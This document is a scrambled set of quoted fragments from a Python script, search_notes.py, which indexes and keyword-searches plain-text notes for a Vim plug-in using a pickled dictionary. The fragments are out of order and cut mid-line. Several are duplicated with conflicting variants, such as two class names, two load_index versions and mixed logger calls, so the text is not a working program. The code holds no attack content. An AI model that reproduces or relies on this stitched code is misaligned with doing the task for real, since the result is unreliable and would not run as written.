module.", "using the pickle # module. The structure of the dictionary may seem very", "# Forget a deleted note. self.delete_note(filename) else: # Check whether previously seen note", "update_timer) def add_note(self, filename, last_modified): \"\"\"Add a note to the index (assumes the", "self.character_encoding, 'ignore') return text def decode(self, text): \"\"\"Decode a string in the user's", "if x != filename] def tokenize(self, text: str) -> Set[str]: \"\"\"Tokenize a string", "last_modified_in_db: self.delete_note_from_index(index, filename) self.add_note_to_index(index, filename, last_modified_on_disk) # Already checked this note, we can", "and len(word) >= 2: words.add(word) return words def normalize(self, keyword): \"\"\"Normalize the case", "to disk.\"\"\" with open(database_file, 'wb') as handle: pickle.dump(index, handle) class NotesIndex: def __init__(self,", "last_modified_on_disk > last_modified_in_db: self.delete_note(filename) self.add_note(filename, last_modified_on_disk) # Already checked this note, we can", "INDEX_VERSION} else: return index class TextIndex: def __init__(self, index_location: str, notes_directories: List[str]): self.index_location", "about the Vim plug-in see http://peterodding.com/code/vim/notes/. \"\"\" Usage: search_notes.py [OPTIONS] KEYWORD... Search one", "logger.info(\"Deleting file from index: %s\", filename) del index['files'][filename] for kw in index['keywords']: index['keywords'][kw]", "if not w.isspace()} def save_index(self, database_file: str, index): \"\"\"Save the keyword index to", "self.first_use = True self.dirty = True self.index = {'keywords': {}, 'files': {}, 'version':", "note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = self.index['files'][filename] if last_modified_on_disk > last_modified_in_db:", "else: index['keywords'][kw].append(filename) def delete_note_from_index(self, index, filename): \"\"\"Delete a note from given index.\"\"\" logger.info(\"Deleting", "%s\", global_timer) else: matches = self.search_index(keywords) if matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching index in", "Levenshtein is not None: decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw)) else: decorated.append((-len(filenames), kw)) decorated.sort() selection", "<<EMAIL>> # Last Change: November 1, 2015 # URL: http://peterodding.com/code/vim/notes/ # License: MIT", "directory) last_count = len(notes_on_disk) logger.info(\"Found a total of %i notes ..\", len(notes_on_disk)) #", "Forget a deleted note. self.delete_note(filename) else: # Check whether previously seen note has", "for filename, last_modified in notes_on_disk.items(): self.add_note_to_index(index, filename, last_modified) # TODO: Only save if", "For more information about the Vim plug-in see http://peterodding.com/code/vim/notes/. \"\"\" Usage: search_notes.py [OPTIONS]", "in the index. If # I really have to I'll probably come up", "text def munge_path(self, path): \"\"\"Canonicalize user-defined path, making it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path)) def", "index_location) with open(index_location, 'rb') as handle: index = pickle.load(handle) logger.debug(\"Format version of index", "'verbose', 'help', ]) except getopt.GetoptError as error: print(str(error)) self.usage() sys.exit(2) # Define the", "index, filename): \"\"\"Delete a note from given index.\"\"\" logger.info(\"Deleting file from index: %s\",", "filename, last_modified in notes_on_disk.items(): self.add_note_to_index(index, filename, last_modified) # TODO: Only save if necessary.", "kw in self.index['keywords']: self.index['keywords'][kw] = [x for x in self.index['keywords'][kw] if x !=", "user notes (can be repeated) -e, --encoding=NAME set character encoding of notes -v,", "is not None: self.list_keywords(self.keyword_filter) logger.debug(\"Finished listing keywords in %s\", global_timer) else: matches =", "return text def munge_path(self, path): \"\"\"Canonicalize user-defined path, making it absolute.\"\"\" return os.path.abspath(os.path.expanduser(path))", "self.index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" self.first_use = False self.dirty = False", "{} last_count = 0 for directory in self.user_directories: print('Scanning', directory) for root, dirs,", "is not None: decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw)) else: decorated.append((-len(filenames), kw)) decorated.sort() selection =", "note from the index.\"\"\" logger.info(\"Removing file from index: %s\", filename) del self.index['files'][filename] for", "directory.\"\"\" user_directories = self.notes_directories index = self.index # First we find the filenames", "fast # keyword searches in the user's notes. It has two advantages over", "in the user's notes. It has two advantages over just # using Vim's", "index['keywords']: index['keywords'][kw] = [x for x in index['keywords'][kw] if x != filename] def", "self.dirty = True def search_index(self, keywords): \"\"\"Return names of files containing all of", "logger.info(\"Adding file to index: %s\", filename) self.index['files'][filename] = last_modified with open(filename, encoding='utf-8') as", "for opt, arg in opts: if opt in ('-i', '--ignore-case'): self.case_sensitive = False", "logging import os import re import sys import time import pickle from typing", "'--list'): self.keyword_filter = arg.strip().lower() elif opt in ('-d', '--database'): self.database_file = arg elif", "in self.tokenize(handle.read()): if kw not in self.index['keywords']: self.index['keywords'][kw] = [filename] else: self.index['keywords'][kw].append(filename) self.dirty", "for k in index['keywords']] for word in needles: submatches = set() for original_db_kw,", "I'll probably come up with something more # efficient, but really it doesn't", "= getopt.getopt(argv, 'il:d:n:e:vh', [ 'ignore-case', 'list=', 'database=', 'notes=', 'encoding=', 'verbose', 'help', ]) except", "an existing index file is found with an # unsupported version, the script", "index. for filename, last_modified in notes_on_disk.items(): self.add_note_to_index(index, filename, last_modified) # TODO: Only save", "more information see http://peterodding.com/code/vim/notes/ \"\"\" # Standard library modules. import codecs import fnmatch", "indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename) self.index['files'][filename] = last_modified with open(filename, encoding='utf-8')", "over just # using Vim's internal :vimgrep command to search all of the", "index file -n, --notes=DIR set directory with user notes (can be repeated) -e,", "= arg.strip().lower() elif opt in ('-d', '--database'): self.database_file = arg elif opt in", "index, updated automatically during each invocation of the program. Valid options include: -i,", "load_index(self.index_location) def search(self, query: str) -> List[str]: \"\"\"Return names of files containing all", "if substring in normalized_kw: if Levenshtein is not None: decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw))", "encoding.\"\"\" if isinstance(text, bytes): text = codecs.decode(text, self.character_encoding, 'ignore') return text def munge_path(self,", "isinstance(text, str): text = codecs.encode(text, self.character_encoding, 'ignore') return text def decode(self, text): \"\"\"Decode", "message and exit For more information see http://peterodding.com/code/vim/notes/ \"\"\" # Standard library modules.", "self.character_encoding, 'ignore') return text def munge_path(self, path): \"\"\"Canonicalize user-defined path, making it absolute.\"\"\"", "= os.path.join(root, filename) notes_on_disk[abspath] = os.path.getmtime(abspath) logger.info(\"Found %i notes in %s ..\", len(notes_on_disk)", "opt in ('-n', '--notes'): self.user_directories.append(arg) elif opt in ('-e', '--encoding'): self.character_encoding = arg", "List[str]): self.index_location = index_location self.notes_directories = notes_directories self.index = load_index(self.index_location) def search(self, query:", "kw in tokenize(raw): if kw not in index['keywords']: index['keywords'][kw] = [filename] else: index['keywords'][kw].append(filename)", "if self.keyword_filter is not None: self.keyword_filter = self.decode(self.keyword_filter) # Canonicalize pathnames, check validity.", "normalized_db_keywords: if word in normalized_db_kw: submatches.update(index['keywords'][original_db_kw]) if matches is None: matches = submatches", "filename] def tokenize(self, text: str) -> Set[str]: \"\"\"Tokenize a string into a list", "in self.index['keywords'].items(): normalized_kw = self.normalize(kw) if substring in normalized_kw: if Levenshtein is not", "index.\"\"\" logger.info(\"Removing file from index: %s\", filename) del self.index['files'][filename] for kw in self.index['keywords']:", "notes don't slow searching down so much; # - Hundreds of notes can", "in normalized_db_kw: submatches.update(index['keywords'][original_db_kw]) if matches is None: matches = submatches else: matches &=", "make more noise -h, --help show this message and exit For more information", "index in %s\", len(self.index['files']), load_timer) except Exception: logger.warn(\"Failed to load index from file!\",", "os.path.join(root, filename) notes_on_disk[abspath] = os.path.getmtime(abspath) logger.info(\"Found %i notes in %s ..\", len(notes_on_disk) -", "into a list of normalized, unique keywords.\"\"\" words = set() text = self.decode(text)", "'' and not word.isspace() and len(word) >= 2: words.add(word) return words def normalize(self,", "it may appear at first sight :-). # # For more information about", "substring), -len(filenames), kw)) else: decorated.append((-len(filenames), kw)) decorated.sort() selection = [d[-1] for d in", "logger.debug(\"Loaded %i notes from index in %s\", len(index['files']), load_timer) except Exception: logger.warning(\"Failed to", "filenames in self.index['keywords'].items(): normalized_kw = self.normalize(kw) if substring in normalized_kw: if Levenshtein is", "index format detected!\" self.first_use = False self.dirty = False logger.debug(\"Loaded %i notes from", "1, 2015 # URL: http://peterodding.com/code/vim/notes/ # License: MIT # # This Python script", "\"\"\"Normalize the case of a keyword if configured to do so.\"\"\" return keyword", "= {} last_count = 0 for directory in self.user_directories: print('Scanning', directory) for root,", "self.index = load_index(self.index_location) def search(self, query: str) -> List[str]: \"\"\"Return names of files", "to perform fast # keyword searches in the user's notes. It has two", "del notes_on_disk[filename] # Add new notes to index. for filename, last_modified in notes_on_disk.items():", "{'keywords': {}, 'files': {}, 'version': INDEX_VERSION} else: return index class TextIndex: def __init__(self,", "len(notes_on_disk) logger.info(\"Found a total of %i notes ..\", len(notes_on_disk)) # Check for updated", "tokenize(raw): if kw not in index['keywords']: index['keywords'][kw] = [filename] else: index['keywords'][kw].append(filename) def delete_note_from_index(self,", "import Levenshtein except ImportError: Levenshtein = None # The version of the index", "the user's notes: # # - Very large notes don't slow searching down", "word in needles: submatches = set() for original_db_kw, normalized_db_kw in normalized_db_keywords: if word", "index) def add_note_to_index(self, index, filename, last_modified): \"\"\"Add a note to the index (assumes", "makes sure repeating strings are stored only # once, so it's not as", "filenames and last modified times of the notes on disk. notes_on_disk = {}", "[] def update_index(self): \"\"\"Update the keyword index by scanning the notes directory.\"\"\" user_directories", "if word in normalized_db_kw: submatches.update(index['keywords'][original_db_kw]) if matches is None: matches = submatches else:", "= [d[-1] for d in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection))) def tokenize(self, text): \"\"\"Tokenize a", "index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note_from_index(index, filename) self.add_note_to_index(index, filename, last_modified_on_disk) # Already checked", "or start with an empty one.\"\"\" try: load_timer = Timer() logger.debug(\"Loading index from", "Only save if necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self, index, filename, last_modified): \"\"\"Add a", "{w.strip() for w in re.findall(r'\\w{3,}', text, re.UNICODE) if not w.isspace()} def save_index(self, database_file:", "a note from given index.\"\"\" logger.info(\"Deleting file from index: %s\", filename) del index['files'][filename]", "{}, 'version': INDEX_VERSION} else: return index class TextIndex: def __init__(self, index_location: str, notes_directories:", "self.keyword_filter is not None: self.keyword_filter = self.decode(self.keyword_filter) # Canonicalize pathnames, check validity. self.database_file", "structure of the dictionary may seem very naive but it's quite # fast.", "update_index(self): \"\"\"Update the keyword index by scanning the notes directory.\"\"\" user_directories = self.notes_directories", "-d, --database=FILE set path to keywords index file -n, --notes=DIR set directory with", "def normalize(self, keyword): \"\"\"Normalize the case of a keyword if configured to do", "in self.tokenize(' '.join(keywords))] def load_index(self): \"\"\"Load the keyword index or start with an", "index from file!\", exc_info=True) return {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} else: return", "for pattern in INCLUDE_PATTERNS): abspath = os.path.join(root, filename) notes_on_disk[abspath] = os.path.getmtime(abspath) logger.info(\"Found %i", "than a second. # # The keyword index is a Python dictionary that's", "Check for updated and/or deleted notes since the last run? if not self.first_use:", "has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = self.index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note(filename)", "decorated.sort() selection = [d[-1] for d in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection))) def tokenize(self, text):", "index from %s ..\", self.database_file) with open(self.database_file, 'rb') as handle: self.index = pickle.load(handle)", "normalized_db_kw in normalized_db_keywords: # Yes I'm using a nested for loop over all", "filename in set(index['files'].keys()): if filename not in notes_on_disk: # Forget a deleted note.", "in user_directories: for root, dirs, files in os.walk(directory): for filename in files: if", "more information about the Vim plug-in see http://peterodding.com/code/vim/notes/. \"\"\" Usage: search_notes.py [OPTIONS] KEYWORD...", "in self.index['keywords'][kw] if x != filename] self.dirty = True def search_index(self, keywords): \"\"\"Return", "str, notes_directories: List[str]): self.index_location = index_location self.notes_directories = notes_directories self.index = load_index(self.index_location) def", "not already indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename) index['files'][filename] = last_modified with", "NotesIndex: def __init__(self, argv=None): \"\"\"Entry point to the notes search.\"\"\" global_timer = Timer()", "version of index loaded from disk: %i\", index['version']) assert index['version'] == INDEX_VERSION, \"Incompatible", "if isinstance(text, bytes): text = codecs.decode(text, self.character_encoding, 'ignore') return text def munge_path(self, path):", "an # unsupported version, the script knows that it should rebuild the index.", "normalized_kw: if Levenshtein is not None: decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw)) else: decorated.append((-len(filenames), kw))", "typing import List, Set try: import Levenshtein except ImportError: Levenshtein = None #", "logger.debug(\"Finished listing keywords in %s\", global_timer) else: matches = self.search_index(keywords) if matches: print('\\n'.join(sorted(matches)))", "decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection))) def tokenize(self, text): \"\"\"Tokenize a string into a list of", "noise -h, --help show this message and exit For more information see http://peterodding.com/code/vim/notes/", "'UTF-8' self.case_sensitive = True self.keyword_filter = None # Map command line options to", "Define the command line option defaults. self.database_file = '~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding", "filename) del self.index['files'][filename] for kw in self.index['keywords']: self.index['keywords'][kw] = [x for x in", "whether previously seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = index['files'][filename] if", "to index: %s\", filename) index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle: raw", "%s\", filename) del index['files'][filename] for kw in index['keywords']: index['keywords'][kw] = [x for x", "self.tokenize(handle.read()): if kw not in self.index['keywords']: self.index['keywords'][kw] = [filename] else: self.index['keywords'][kw].append(filename) self.dirty =", "in ('-e', '--encoding'): self.character_encoding = arg elif opt in ('-v', '--verbose'): logger.setLevel(logging.DEBUG) elif", "Usage: search_notes.py [OPTIONS] KEYWORD... Search one or more directories of plain text files", "{} last_count = 0 for directory in user_directories: for root, dirs, files in", "with open(self.database_file, 'rb') as handle: self.index = pickle.load(handle) logger.debug(\"Format version of index loaded", "index to disk.\"\"\" save_timer = Timer() with open(self.database_file, 'wb') as handle: pickle.dump(self.index, handle)", "for kw in self.tokenize(handle.read()): if kw not in self.index['keywords']: self.index['keywords'][kw] = [filename] else:", "self.keyword_filter = arg.strip().lower() elif opt in ('-d', '--database'): self.database_file = arg elif opt", "user's preferred character encoding.\"\"\" if isinstance(text, str): text = codecs.encode(text, self.character_encoding, 'ignore') return", "changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note_from_index(index, filename)", "notes_on_disk[filename] last_modified_in_db = index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note_from_index(index, filename) self.add_note_to_index(index, filename, last_modified_on_disk)", "in normalized_kw: if Levenshtein is not None: decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw)) else: decorated.append((-len(filenames),", "filename not in notes_on_disk: # Forget a deleted note. self.delete_note_from_index(index, filename) else: #", "query: str) -> List[str]: \"\"\"Return names of files containing all of the given", "def parse_args(self, argv): \"\"\"Parse the command line arguments.\"\"\" try: opts, keywords = getopt.getopt(argv,", "the index.\"\"\" logger.info(\"Removing file from index: %s\", filename) del self.index['files'][filename] for kw in", "# keyword searches in the user's notes. It has two advantages over just", "self.index = {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} def save_index(self): \"\"\"Save the keyword", "print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching index in %s\", global_timer) def parse_args(self, argv): \"\"\"Parse the command", "all (matching) keywords to standard output.\"\"\" print('listing keywords') decorated = [] substring =", "for word in re.findall(r'\\w+', text, re.UNICODE): word = word.strip() if word != ''", "self.dirty = False logger.debug(\"Loaded %i notes from index in %s\", len(self.index['files']), load_timer) except", "of index loaded from disk: %i\", index['version']) assert index['version'] == INDEX_VERSION, \"Incompatible index", "files containing all of the given keywords.\"\"\" matches = None normalized_db_keywords = [(k,", "getopt import logging import os import re import sys import time import pickle", "for kw in self.index['keywords']: self.index['keywords'][kw] = [x for x in self.index['keywords'][kw] if x", "self.normalize(substring) for kw, filenames in self.index['keywords'].items(): normalized_kw = self.normalize(kw) if substring in normalized_kw:", "self.usage() sys.exit(2) # Define the command line option defaults. self.database_file = '~/.vim/misc/notes/index.pickle' self.user_directories", "--list=SUBSTR list keywords matching substring -d, --database=FILE set path to keywords index file", "= logging.getLogger(__name__) def load_index(index_location): try: load_timer = Timer() logger.debug(\"Loading index from %s ..\",", "def delete_note_from_index(self, index, filename): \"\"\"Delete a note from given index.\"\"\" logger.info(\"Deleting file from", "%i notes in %s ..\", len(notes_on_disk) - last_count, directory) last_count = len(notes_on_disk) logger.info(\"Found", "('-e', '--encoding'): self.character_encoding = arg elif opt in ('-v', '--verbose'): logger.setLevel(logging.DEBUG) elif opt", "= self.index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note(filename) self.add_note(filename, last_modified_on_disk) # Already checked this", "[] substring = self.normalize(substring) for kw, filenames in self.index['keywords'].items(): normalized_kw = self.normalize(kw) if", "..\", len(notes_on_disk) - last_count, directory) last_count = len(notes_on_disk) logger.info(\"Found a total of %i", "\"\"\"Tokenize a string into a list of normalized, unique keywords.\"\"\" words = set()", "keep track of long during operations.\"\"\" def __init__(self): self.start_time = time.time() def __str__(self):", "list keywords matching substring -d, --database=FILE set path to keywords index file -n,", "to ignore during scans. INCLUDE_PATTERNS = {'*.md', '*.txt'} NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH =", "matches is None: matches = submatches else: matches &= submatches return sorted(matches) if", "this revision of the # `search_notes.py' script; if an existing index file is", "keywords in %s\", global_timer) else: matches = self.search_index(keywords) if matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching", "opt in ('-l', '--list'): self.keyword_filter = arg.strip().lower() elif opt in ('-d', '--database'): self.database_file", "[] def list_keywords(self, substring, limit=25): \"\"\"Print all (matching) keywords to standard output.\"\"\" print('listing", "logger.debug(\"Finished searching index in %s\", global_timer) def parse_args(self, argv): \"\"\"Parse the command line", "open(filename, encoding='utf-8') as handle: for kw in self.tokenize(handle.read()): if kw not in self.index['keywords']:", "\"\"\"Encode a string in the user's preferred character encoding.\"\"\" if isinstance(text, str): text", "w.isspace()} def save_index(self, database_file: str, index): \"\"\"Save the keyword index to disk.\"\"\" with", "\"\"\"Save the keyword index to disk.\"\"\" with open(database_file, 'wb') as handle: pickle.dump(index, handle)", "handle: pickle.dump(index, handle) class NotesIndex: def __init__(self, argv=None): \"\"\"Entry point to the notes", "# Author: <NAME> <<EMAIL>> # Last Change: November 1, 2015 # URL: http://peterodding.com/code/vim/notes/", "%s\", update_timer) def add_note(self, filename, last_modified): \"\"\"Add a note to the index (assumes", "handle: index = pickle.load(handle) logger.debug(\"Format version of index loaded from disk: %i\", index['version'])", "= index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note_from_index(index, filename) self.add_note_to_index(index, filename, last_modified_on_disk) # Already", "see http://peterodding.com/code/vim/notes/ \"\"\" # Standard library modules. import codecs import fnmatch import getopt", "self.save_index() if self.keyword_filter is not None: self.list_keywords(self.keyword_filter) logger.debug(\"Finished listing keywords in %s\", global_timer)", "already indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename) index['files'][filename] = last_modified with open(filename,", "word.isspace() and len(word) >= 2: words.add(word) return words def normalize(self, keyword): \"\"\"Normalize the", "return text def decode(self, text): \"\"\"Decode a string in the user's preferred character", "logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character encoding: %s\", self.character_encoding) if self.keyword_filter is not None:", "Python dictionary that's persisted using the pickle # module. The structure of the", "#!/usr/bin/env python # Python script for fast text file searching using keyword index", "disk.\"\"\" with open(database_file, 'wb') as handle: pickle.dump(index, handle) class NotesIndex: def __init__(self, argv=None):", "if last_modified_on_disk > last_modified_in_db: self.delete_note(filename) self.add_note(filename, last_modified_on_disk) # Already checked this note, we", "encoding='utf-8') as handle: for kw in self.tokenize(handle.read()): if kw not in self.index['keywords']: self.index['keywords'][kw]", "the user's notes. It has two advantages over just # using Vim's internal", "has two advantages over just # using Vim's internal :vimgrep command to search", "= self.search_index(keywords) if matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching index in %s\", global_timer) def parse_args(self,", "defaults. self.database_file = '~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8' self.case_sensitive = True", "names of files containing all of the given keywords.\"\"\" matches = None normalized_db_keywords", "notes since the last run? if not self.first_use: for filename in self.index['files'].keys(): if", "large notes don't slow searching down so much; # - Hundreds of notes", "detected!\" logger.debug(\"Loaded %i notes from index in %s\", len(index['files']), load_timer) except Exception: logger.warning(\"Failed", "Exception: logger.warning(\"Failed to load index from file!\", exc_info=True) return {'keywords': {}, 'files': {},", "for w in re.findall(r'\\w{3,}', text, re.UNICODE) if not w.isspace()} def save_index(self, database_file: str,", "assert index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" logger.debug(\"Loaded %i notes from index", "in ('-l', '--list'): self.keyword_filter = arg.strip().lower() elif opt in ('-d', '--database'): self.database_file =", "Return tokenized keyword arguments. return [self.normalize(k) for k in self.tokenize(' '.join(keywords))] def load_index(self):", "in %s\", save_timer) def update_index(self): \"\"\"Update the keyword index by scanning the notes", "any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS): abspath = os.path.join(root, filename) notes_on_disk[abspath] = os.path.getmtime(abspath)", "= Timer() with open(self.database_file, 'wb') as handle: pickle.dump(self.index, handle) logger.debug(\"Saved index to disk", "seconds\" % self.elapsed_time @property def elapsed_time(self): return time.time() - self.start_time if __name__ ==", "getopt.GetoptError as error: print(str(error)) self.usage() sys.exit(2) # Define the command line option defaults.", "index') index = load_index(INDEX_FILE_PATH) needles = query.split() matches = None normalized_db_keywords = [(k,", "filename in files: if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS): abspath = os.path.join(root,", "is not already indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename) index['files'][filename] = last_modified", "ignore case of keyword(s) -l, --list=SUBSTR list keywords matching substring -d, --database=FILE set", "format that's supported by this revision of the # `search_notes.py' script; if an", "index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle: raw = handle.read() for kw", "a note from the index.\"\"\" logger.info(\"Removing file from index: %s\", filename) del self.index['files'][filename]", "text, re.UNICODE) if not w.isspace()} def save_index(self, database_file: str, index): \"\"\"Save the keyword", "submatches else: matches &= submatches return sorted(matches) if matches else [] def update_index(self):", "if matches is None: matches = submatches else: matches &= submatches return list(matches)", "text def decode(self, text): \"\"\"Decode a string in the user's preferred character encoding.\"\"\"", "self.index['keywords'][kw] = [filename] else: self.index['keywords'][kw].append(filename) self.dirty = True def delete_note(self, filename): \"\"\"Remove a", "= notes_on_disk[filename] last_modified_in_db = index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note_from_index(index, filename) self.add_note_to_index(index, filename,", "self.tokenize(' '.join(keywords))] def load_index(self): \"\"\"Load the keyword index or start with an empty", "for filename in files: if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS): abspath =", "forget about it. del notes_on_disk[filename] # Add new notes to index. for filename,", "November 1, 2015 # URL: http://peterodding.com/code/vim/notes/ # License: MIT # # This Python", "one.\"\"\" try: load_timer = Timer() logger.debug(\"Loading index from %s ..\", self.database_file) with open(self.database_file,", "open(filename, encoding='utf-8') as handle: raw = handle.read() for kw in tokenize(raw): if kw", "a note to the index (assumes the note is not already indexed).\"\"\" logger.info(\"Adding", "self.index['keywords'][kw] if x != filename] self.dirty = True def search_index(self, keywords): \"\"\"Return names", "try: opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [ 'ignore-case', 'list=', 'database=', 'notes=', 'encoding=', 'verbose',", "def add_note_to_index(self, index, filename, last_modified): \"\"\"Add a note to the index (assumes the", "print(self.encode(u'\\n'.join(selection))) def tokenize(self, text): \"\"\"Tokenize a string into a list of normalized, unique", "except getopt.GetoptError as error: print(str(error)) self.usage() sys.exit(2) # Define the command line option", "it's plenty fast. if usr_kw in normalized_db_kw: submatches.update(self.index['keywords'][original_db_kw]) if matches is None: matches", "already indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename) self.index['files'][filename] = last_modified with open(filename,", "with open(database_file, 'wb') as handle: pickle.dump(index, handle) class NotesIndex: def __init__(self, argv=None): \"\"\"Entry", "command line options to variables. for opt, arg in opts: if opt in", "arg.strip().lower() elif opt in ('-d', '--database'): self.database_file = arg elif opt in ('-n',", "of files containing all of the given keywords.\"\"\" print('Searching index') index = load_index(INDEX_FILE_PATH)", "--verbose make more noise -h, --help show this message and exit For more", "found with an # unsupported version, the script knows that it should rebuild", "index: %s\", filename) del index['files'][filename] for kw in index['keywords']: index['keywords'][kw] = [x for", "fast text file searching using keyword index on disk. # # Author: <NAME>", "index is a Python dictionary that's persisted using the pickle # module. The", "directories: %r\", self.user_directories) logger.debug(\"Character encoding: %s\", self.character_encoding) if self.keyword_filter is not None: self.keyword_filter", "in notes_on_disk.items(): self.add_note_to_index(index, filename, last_modified) # TODO: Only save if necessary. self.save_index(INDEX_FILE_PATH, index)", "self.character_encoding = arg elif opt in ('-v', '--verbose'): logger.setLevel(logging.DEBUG) elif opt in ('-h',", "notes_on_disk[abspath] = os.path.getmtime(abspath) logger.info(\"Found %i notes in %s ..\", len(notes_on_disk) - last_count, directory)", "validity. self.database_file = self.munge_path(self.database_file) self.user_directories = [self.munge_path(d) for d in self.user_directories if os.path.isdir(d)]", "files containing all of the given keywords.\"\"\" print('Searching index') index = load_index(INDEX_FILE_PATH) needles", "output.\"\"\" print('listing keywords') decorated = [] substring = self.normalize(substring) for kw, filenames in", "the filenames and last modified times of the notes on disk. notes_on_disk =", "# Canonicalize pathnames, check validity. self.database_file = self.munge_path(self.database_file) self.user_directories = [self.munge_path(d) for d", "notes in %s ..\", len(notes_on_disk) - last_count, directory) last_count = len(notes_on_disk) logger.info(\"Found a", "last_modified_in_db = self.index['files'][filename] if last_modified_on_disk > last_modified_in_db: self.delete_note(filename) self.add_note(filename, last_modified_on_disk) # Already checked", "of files containing all of the given keywords.\"\"\" matches = None normalized_db_keywords =", "%r\", self.user_directories) logger.debug(\"Character encoding: %s\", self.character_encoding) if self.keyword_filter is not None: self.keyword_filter =", "last_modified in notes_on_disk.items(): self.add_note(filename, last_modified) logger.info(\"Updated index in %s\", update_timer) def add_note(self, filename,", "index = pickle.load(handle) logger.debug(\"Format version of index loaded from disk: %i\", index['version']) assert", "if filename not in notes_on_disk: # Forget a deleted note. self.delete_note(filename) else: #", "of the user's notes: # # - Very large notes don't slow searching", "!= filename] self.dirty = True def search_index(self, keywords): \"\"\"Return names of files containing", "to use timer to keep track of long during operations.\"\"\" def __init__(self): self.start_time", "times of the notes on disk. notes_on_disk = {} last_count = 0 for", "the index format that's supported by this revision of the # `search_notes.py' script;", "a second. # # The keyword index is a Python dictionary that's persisted", "-- I have over # 850 notes (about 8 MB) and 25000 keywords", "for root, dirs, files in os.walk(directory): for filename in files: if any(fnmatch.fnmatch(filename, pattern)", "disk: %i\", self.index['version']) assert self.index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" self.first_use =", "= True def delete_note(self, filename): \"\"\"Remove a note from the index.\"\"\" logger.info(\"Removing file", "# # Author: <NAME> <<EMAIL>> # Last Change: November 1, 2015 # URL:", "last_count = 0 for directory in user_directories: for root, dirs, files in os.walk(directory):", "of the # `search_notes.py' script; if an existing index file is found with", "note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = index['files'][filename] if last_modified_on_disk > last_modified_in_db:", "the index (assumes the note is not already indexed).\"\"\" logger.info(\"Adding file to index:", "kw not in index['keywords']: index['keywords'][kw] = [filename] else: index['keywords'][kw].append(filename) def delete_note_from_index(self, index, filename):", "False logger.debug(\"Loaded %i notes from index in %s\", len(self.index['files']), load_timer) except Exception: logger.warn(\"Failed", "text = codecs.decode(text, self.character_encoding, 'ignore') return text def munge_path(self, path): \"\"\"Canonicalize user-defined path,", "index on disk. # # Author: <NAME> <<EMAIL>> # Last Change: November 1,", "be searched in less than a second. # # The keyword index is", "root, dirs, files in os.walk(directory): for filename in files: if any(fnmatch.fnmatch(filename, pattern) for", "re.UNICODE): word = word.strip() if word != '' and not word.isspace() and len(word)", "= codecs.decode(text, self.character_encoding, 'ignore') return text def munge_path(self, path): \"\"\"Canonicalize user-defined path, making", "update_timer = Timer() # First we find the filenames and last modified times", "have over # 850 notes (about 8 MB) and 25000 keywords and it's", "None normalized_db_keywords = [(k, self.normalize(k)) for k in self.index['keywords']] for usr_kw in keywords:", "with an # unsupported version, the script knows that it should rebuild the", "# Standard library modules. import codecs import fnmatch import getopt import logging import", "the note is not already indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename) self.index['files'][filename]", "[filename] else: index['keywords'][kw].append(filename) def delete_note_from_index(self, index, filename): \"\"\"Delete a note from given index.\"\"\"", "Valid options include: -i, --ignore-case ignore case of keyword(s) -l, --list=SUBSTR list keywords", "not in index['keywords']: index['keywords'][kw] = [filename] else: index['keywords'][kw].append(filename) def delete_note_from_index(self, index, filename): \"\"\"Delete", "from typing import List, Set try: import Levenshtein except ImportError: Levenshtein = None", "'.join(keywords))] def load_index(self): \"\"\"Load the keyword index or start with an empty one.\"\"\"", "list_keywords(self, substring, limit=25): \"\"\"Print all (matching) keywords to standard output.\"\"\" print('listing keywords') decorated", "word in normalized_db_kw: submatches.update(index['keywords'][original_db_kw]) if matches is None: matches = submatches else: matches", "version of index loaded from disk: %i\", self.index['version']) assert self.index['version'] == INDEX_VERSION, \"Incompatible", "notes_on_disk.items(): self.add_note_to_index(index, filename, last_modified) # TODO: Only save if necessary. self.save_index(INDEX_FILE_PATH, index) def", "= None normalized_db_keywords = [(k, k.lower()) for k in 